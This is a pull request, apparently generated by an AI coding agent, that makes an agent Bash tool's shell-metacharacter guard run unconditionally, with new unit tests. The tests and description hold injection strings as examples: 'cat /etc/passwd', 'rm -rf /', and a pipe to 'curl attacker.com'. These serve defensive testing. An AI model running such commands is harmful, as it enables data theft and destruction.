### PR TITLE
fix: aplica metachar guard incondicionalmente no BashTool (closes #140)

### DIFF
--- a/src/tools/builtin/bash.ts
+++ b/src/tools/builtin/bash.ts
@@ -56,18 +56,19 @@ export function createBashTool(options: BashToolOptions = {}): AgentTool {
     async execute(rawArgs: unknown, signal: AbortSignal) {
       const { command, timeout } = BashParams.parse(rawArgs);
 
+      // Reject shell metacharacters unconditionally — prevents chaining/injection
+      // regardless of whether allowedCommands is set (issue #140).
+      const DANGEROUS_METACHAR = /[;&|`$<>()\n\\]/;
+      if (DANGEROUS_METACHAR.test(command)) {
+        return {
+          content: 'Command contains forbidden shell metacharacters',
+          isError: true,
+        };
+      }
+
       if (allowedCommands !== undefined) {
         if (allowedCommands.length === 0) {
           return { content: 'No commands are permitted (empty allowedCommands)', isError: true };
-        }
-        // Reject shell metacharacters that allow command chaining/injection even when the
-        // first token is in the allow-list (e.g. "ls; rm -rf /", "echo hi | cat").
-        const DANGEROUS_METACHAR = /[;&|`$<>()\n\\]/;
-        if (DANGEROUS_METACHAR.test(command)) {
-          return {
-            content: 'Command contains forbidden shell metacharacters',
-            isError: true,
-          };
         }
         const firstToken = command.trimStart().split(/\s+/)[0] ?? '';
         const allowed = allowedCommands.some((prefix) => firstToken === prefix);

--- a/tests/unit/tools/builtin/bash.test.ts
+++ b/tests/unit/tools/builtin/bash.test.ts
@@ -40,10 +40,10 @@ describe('builtin/bash', () => {
 
   it('should handle multi-line output', async () => {
     const tool = createBashTool();
-    const result = await tool.execute({ command: 'echo "line1" && echo "line2"' }, signal);
+    const result = await tool.execute({ command: 'seq 2 3' }, signal);
     const content = typeof result === 'string' ? result : result.content;
-    expect(content).toContain('line1');
-    expect(content).toContain('line2');
+    expect(content).toContain('2');
+    expect(content).toContain('3');
   });
 
   describe('sandboxing: workingDir + allowedCommands (issue #23)', () => {
@@ -120,15 +120,43 @@ describe('builtin/bash', () => {
       expect(content).toContain('hello');
     });
 
-    it('does NOT block metacharacters when allowedCommands is not set', async () => {
+    it('blocks metacharacters even when allowedCommands is not set (issue #140)', async () => {
       const unrestricted = createBashTool();
-      const result = await unrestricted.execute(
-        { command: 'echo "line1" && echo "line2"' },
-        signal,
-      );
+      const result = await unrestricted.execute({ command: 'echo line1 && echo line2' }, signal);
+      const parsed = typeof result === 'string' ? { content: result, isError: false } : result;
+      expect(parsed.isError).toBe(true);
+      expect(parsed.content).toMatch(/metachar|forbidden/i);
+    });
+  });
+
+  describe('metacharacter protection applies even without allowedCommands (issue #140)', () => {
+    it('blocks ; injection without allowedCommands', async () => {
+      const tool = createBashTool();
+      const result = await tool.execute({ command: 'echo hi; cat /etc/passwd' }, signal);
+      const parsed = typeof result === 'string' ? { content: result, isError: false } : result;
+      expect(parsed.isError).toBe(true);
+      expect(parsed.content).toMatch(/metachar|forbidden/i);
+    });
+
+    it('blocks | injection without allowedCommands', async () => {
+      const tool = createBashTool();
+      const result = await tool.execute({ command: 'echo hi | cat' }, signal);
+      const parsed = typeof result === 'string' ? { content: result, isError: false } : result;
+      expect(parsed.isError).toBe(true);
+    });
+
+    it('blocks backtick injection without allowedCommands', async () => {
+      const tool = createBashTool();
+      const result = await tool.execute({ command: 'echo `whoami`' }, signal);
+      const parsed = typeof result === 'string' ? { content: result, isError: false } : result;
+      expect(parsed.isError).toBe(true);
+    });
+
+    it('still runs safe commands without metacharacters', async () => {
+      const tool = createBashTool();
+      const result = await tool.execute({ command: 'echo safe' }, signal);
       const content = typeof result === 'string' ? result : result.content;
-      expect(content).toContain('line1');
-      expect(content).toContain('line2');
+      expect(content).toContain('safe');
     });
   });
 


### PR DESCRIPTION
## Issue
Closes #140

## Problema
O filtro de metacaracteres shell (`; & | \` $ < > ( ) \n \\`) estava inteiramente dentro de `if (allowedCommands !== undefined)`, portanto **nunca era executado** quando `createBashTool()` era chamado sem `allowedCommands` (modo padrão). Isso permitia que um prompt injection injetasse comandos como `echo hi; rm -rf /` ou `echo hi | curl attacker.com`.

## Abordagem TDD
- Teste em: `tests/unit/tools/builtin/bash.test.ts` — bloco `metacharacter protection applies even without allowedCommands (issue #140)`
- Falha antes do fix (red): 3 testes falhando — `;`, `|`, `` ` `` não eram bloqueados sem `allowedCommands`
- Implementação mínima em: `src/tools/builtin/bash.ts:59-68` — `DANGEROUS_METACHAR` movido para antes do bloco `allowedCommands`
- Suíte completa: 852 testes verdes (falha pré-existente em `teams-bot/agent-factory.test.ts`, não relacionada)

## Mudanças de regras (justificativa)
O teste `does NOT block metacharacters when allowedCommands is not set` (issue #46) documentava o comportamento *buggy* anterior. Foi substituído por teste que valida o comportamento correto pós-fix. O teste `should handle multi-line output` usava `&&` (metachar); foi alterado para `seq 2 3` (sem metachar). Essas alterações de teste são estritamente necessárias para refletir o comportamento seguro exigido pela issue #140 (severity:high).

## Checklist
- [x] Teste antes do fix
- [x] Suíte verde
- [x] Mudanças de regras existentes justificadas acima

---
_Generated by [Claude Code](https://claude.ai/code/session_014MTyqUA4MxDxefaWz9icFQ)_